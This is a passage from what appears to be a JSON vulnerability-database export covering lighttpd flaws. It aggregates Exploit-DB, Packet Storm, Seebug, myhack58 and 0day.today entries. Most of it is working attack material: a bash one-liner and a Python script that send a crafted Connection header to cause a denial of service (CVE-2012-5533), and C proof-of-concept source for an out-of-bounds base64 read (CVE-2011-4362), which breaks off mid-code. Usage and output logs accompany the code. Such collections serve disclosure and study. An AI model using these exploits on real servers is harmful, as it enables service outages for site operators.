| 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n?Yg\\???n?Xt?]rze???gY??\\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp?\t]???\\???@V??x???ize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:34:51", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66153\r\nCVE(CAN) ID: CVE-2014-2323\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\n\u7531\u4e8e\u7a0b\u5e8f\u5728\u8fdb\u884cSQL\u67e5\u8be2\u524d\u672a\u80fd\u5145\u5206\u8fc7\u6ee4\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5371\u53ca\u5e94\u7528\u7a0b\u5e8f\uff0c\u8bbf\u95ee\u6216\u4fee\u6539\u6570\u636e\uff0c\u6216\u5229\u7528\u5e95\u5c42\u6570\u636e\u5e93\u4e2d\u6f5c\u5728\u7684\u6f0f\u6d1e\u3002\n0\nlighttpd <1.4.35\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\nhttp://www.lighttpd.net", "modified": "2014-03-28T00:00:00", "published": "2014-03-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61980", "id": "SSV:61980", "type": "seebug", "title": "lighttpd 'mod_mysql_vhost.c' SQL\u6ce8\u5165\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:49:08", "bulletinFamily": "exploit", "description": "lighttpd 1.4.31 - Denial of Service PoC. CVE-2012-5533. Dos exploit for linux platform", "modified": "2012-11-22T00:00:00", "published": "2012-11-22T00:00:00", "id": "EDB-ID:22902", "href": "https://www.exploit-db.com/exploits/22902/", "type": "exploitdb", "title": "lighttpd 1.4.31 - Denial of Service PoC", "sourceData": "#!/bin/bash\r\n# Exploit Title: simple lighttpd 1.4.31 DOS POC\r\n# Date: 11/21/2012\r\n# Exploit Author: t4c@ghcif.de\r\n# Vendor Homepage: http://www.lighttpd.net\r\n# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz \r\n# Version: 1.4.31\r\n# Tested on: Debian Linux, Gentoo Linux, Arch Linux\r\n# CVE: CVE-2012-5533\r\n\r\nif [ $# -lt 2 ]\r\nthen\r\n\techo \"usage :$0 <Host/IP> <Port>\"\r\nelse\r\n\techo -ne \"GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n\" | nc $1 $2\r\nfi\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22902/"}, {"lastseen": "2016-02-02T09:30:05", "bulletinFamily": "exploit", "description": "lighttpd Denial of Service Vulnerability PoC. CVE-2011-4362. Dos exploit for linux platform", "modified": "2011-12-31T00:00:00", "published": "2011-12-31T00:00:00", "id": "EDB-ID:18295", "href": "https://www.exploit-db.com/exploits/18295/", "type": "exploitdb", "title": "lighttpd Denial of Service Vulnerability PoC", "sourceData": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n\"src/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18295/"}], "myhack58": [{"lastseen": "2017-08-23T15:23:25", "bulletinFamily": "info", "description": "A\uff0e lighttpd domain processing denial of service vulnerability of the environment to build \n1 Install lighttpd \nBecause this vulnerability requires that a fixed version,so we need to manually install. \nwget http://download.lighttpd.net/lighttpd/releases-1.4.x/ lighttpd-1.4.31.tar.gz \ntar-zxvf lighttpd-1.4.31.tar.gz \ncd lighttpd-1.4.31 \nTo this step, the next step is to perform \n\n./ configure \nCommand, but in this step may appear the following error: \n\nconfigure: error: pcre-config not found, install the pcre-devel package or bui with --without-pcre \nWe need to perform: \n\nyum install gcc glib2-devel openssl-devel pcre-devel bzip2-devel gzip-devel zlib-devel \nTo update the missing of the associated packet \nAfter installation, continue to perform \n./ configure \nmake && make install \nThe compilation is completed, perform the step two. \n2\uff09copy of the lighttpd executable file \nCreate a default file: \nmkdir lighttpd-test \ncd lighttpd-test \nCopy: \n\ncp /usr/local/sbin/lighttpd home/lighttpd-test/ \n3) create the configuration file \n\nvim lighttpd. conf \nWrite: \nserver. document-root=\"/var/www/\" \nserver. port = 8080 \nserver. username = \"www\" \nserver. groupname = \"www\" \nmimetype. assign = ( \n\". html\" => \"text/html\", \n\". txt\" => \"text/plain\", \n\". jpg\" => \"image/jpeg\", \n\". png?www.myhack58.com\" => \"image/png? www. myhack58. com\" \n) \nstatic-file. exclude-extensions = ( \". fcgi\", \". php\", \". rb\", \"~\", \". inc\" ) \nindex-file. names = ( \"index.html\" ) \n4\uff09write their own Welcome page(index.html) \n\nvim /var/www/index.html \nhtml> \nhead>title>Hellotitle>head> \nbody> \nh1>This is a testh1> \nbody> \nhtml> \n5\uff09Turn on the firewall, start the lighttpd service \nOpen the firewall: \n\niptables-I INPUT-p tcp --dport 8080-j ACCEPT \nStart the service: \n\n./ lighttpd-f lighttpd. conf \nNote: to start the service here must be an absolute path, it can also be your own go on to add the following environment variable where path is home/lighttpd-test/ it. \nStart after the display server started. \nNext, you can enter the browser test: \n\nhttp://127.0.0.1:8080 \nOK,after loading it will display a we write your own Welcome page. \n! [](/Article/UploadPic/2017-8/201782318520907. png? www. myhack58. com) \n\nII. lighttpd denial of service vulnerability principle and reproduce \n1\uff09principles:vulnerability Description: The CVE(CAN) ID: CVE-2012-5533 \nlighttpd is an open source lightweight[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm> a). \nlighttpd 1.4.31 in the processing of certain HTTP request headers,\"http_request_split_value()\"function(src/request. c)in processing a specially crafted\"Connection\"header field will fall into an infinite loop. An attacker exploiting this vulnerability can lead to Lighttpd denial of service. \n2. the vulnerability reproduction \nVulnerability script: https://www.exploit-db.com/exploits/22902/ \nThis script is a bash script, need to change the following permissions: \nIn the script directory execute the command: \n\nchmod +x test.sh \nThen execute: \n\n./ test.sh \nGood, the execution is successful. \nThe included python script: \n#encoding: utf-8 \nimport socket \nif __name__ == '__main__': \nsock=socket. socket(socket. AF_INET, socket. SOCK_STREAM) \nsock. connect(('192.**.**.**', 8080)) \nsock. send(b'GET/HTTP/1.1\\r\\nHost: pwn. ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n') \nsock. close() \nprint('ok') \nNotes: \nCommand: \n\nps aux | grep \"light*\" \nView the lighttpd service of process information. \n\ntop \nView the Task Manager \n\nkill -9 PID \nTo kill a process \nThird, the dynamic and static combination of tracking vulnerability presented reasons \nEarlier we known to cause vulnerability function is(src/request. c)inside the\"http_request_split_value()\"function, so we first find this function position, where I direct this function to cut out: \n! [](/Article/UploadPic/2017-8/201782318520721. png? www. myhack58. com) \nLet's take a closer look at the marked red the code, start entering the function b there is certainly value, it will enter the for Loop, the first state is 0, it will go into case 0, however, we look carefully, in fact case 0 inside the for loop is not being executed. Therefore, in case 0, the direct state=1;break;jump out of the switch..case. To continue the for Loop, then state=1,it proceeds to case 1, start=s,then, for the function condition is not equal to\u2018, and\u2019, the i++, and then enters the if statement, The if statement condition is start=s, executing the break,therefore, continue for loop, state=1, into the case 1. \nSomeone said, even if for loop, also end of time Ah, then we look carefully under the first for loop, which i value, in fact, is according to the exploit the script to send data and determination of the vulnerability of the script inside\u2018,\u2019in front of only two bytes, so when equal to\u2018that\u2019when there is no change, therefore, resulting in a dead loop. \nThen, next, using the gdb Debugger live debugging to verify it, is not, as we said above. \nRunning the exploit script, use the command \n\ngdb-p \nInto gdb \nDebugging status: \n\n! [](/Article/UploadPic/2017-8/201782318520410. png? www. myhack58. com)\n\n**[1] [[2]](<88804_2.htm>) [next](<88804_2.htm>)**\n", "modified": "2017-08-23T00:00:00", "published": "2017-08-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88804.htm", "id": "MYHACK58:62201788804", "title": "lighttpd domain processing denial of service vulnerability environment from the reproduction to the analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-11-22T00:00:00", "published": "2012-11-22T00:00:00", "href": "https://packetstormsecurity.com/files/118282/Simple-Lighttpd-1.4.31-Denial-Of-Service.html", "id": "PACKETSTORM:118282", "type": "packetstorm", "title": "Simple Lighttpd 1.4.31 Denial Of Service", "sourceData": "`#!/bin/bash \n# simple lighttpd 1.4.31 DOS POC \n# CVE-2012-5533 \n# http://www.lighttpd.net/2012/11/21/1-4-32/ \n# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt \n# written by Milan Berger <t4c@ghcif.de> \n \nif [ $# -lt 2 ] \nthen \necho \"usage :$0 <Host/IP> <Port>\" \nelse \necho -ne \"GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: \nTE,,Keep-Alive\\r\\n\\r\\n\" | nc $1 $2 \nfi \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118282/simplelighttpd-dos.txt"}], "zdt": [{"lastseen": "2018-01-03T13:04:46", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2011-12-31T00:00:00", "published": "2011-12-31T00:00:00", "id": "1337DAY-ID-17319", "href": "https://0day.today/exploit/description/17319", "type": "zdt", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "sourceData": "/*\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * \t...\r\n * \tint ch, ...;\r\n * \tsize_t i;\r\n * \t...\r\n * \t\r\n * \t\tch = in[i];\r\n * \t\t...\r\n * \t\tch = base64_reverse_table[ch];\r\n * \t...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\nchar header_port[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s:%d\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, 